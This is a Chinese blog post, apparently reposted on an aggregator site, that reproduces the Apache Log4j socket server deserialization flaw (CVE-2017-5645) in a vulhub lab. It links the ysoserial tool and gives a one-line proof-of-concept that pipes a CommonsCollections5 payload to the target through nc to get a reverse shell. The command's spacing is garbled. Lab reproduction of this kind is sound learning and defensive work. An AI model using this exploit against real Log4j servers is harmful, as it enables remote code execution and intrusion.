概述
由于最近项目遇到这个漏洞,复现学习一下。
一、漏洞介绍
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
二、漏洞环境
https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
执行如下命令启动漏洞环境
docker-compose up -d
下载环境
服务开启
三、漏洞复现
先要下载一个:
ysoserial-master-30099844c6-1.jar
地址:
源码下载地址 :
https://codeload.github.com/frohoff/ysoserial/zip/master
jar包下载地址:
https://jitpack.io/com/github/frohoff/ysoserial/master-30099844c6-1/ysoserial-master-30099844c6-1.jar
ysoserial简介
ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload;由于其中部分payload使用到的低版本JDK中的类,所以建议自己私下分析学习时使用低版本JDK JDK版本建议在1.7u21以下。
poc执行:
java-jar ysoserial-master-30099844c6-1.jar CommonsCollections5"需要执行的脚本base64 encode"| nc192.168.0.1024712
执行poc
接收反弹shell
四、参考:
https://paper.seebug.org/1171/
https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
后台回复"ysoserial"也可下载ysoserial-master-30099844c6-1.jar
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
最后
以上就是无限唇膏为你收集整理的Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现的全部内容,希望文章能够帮你解决Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复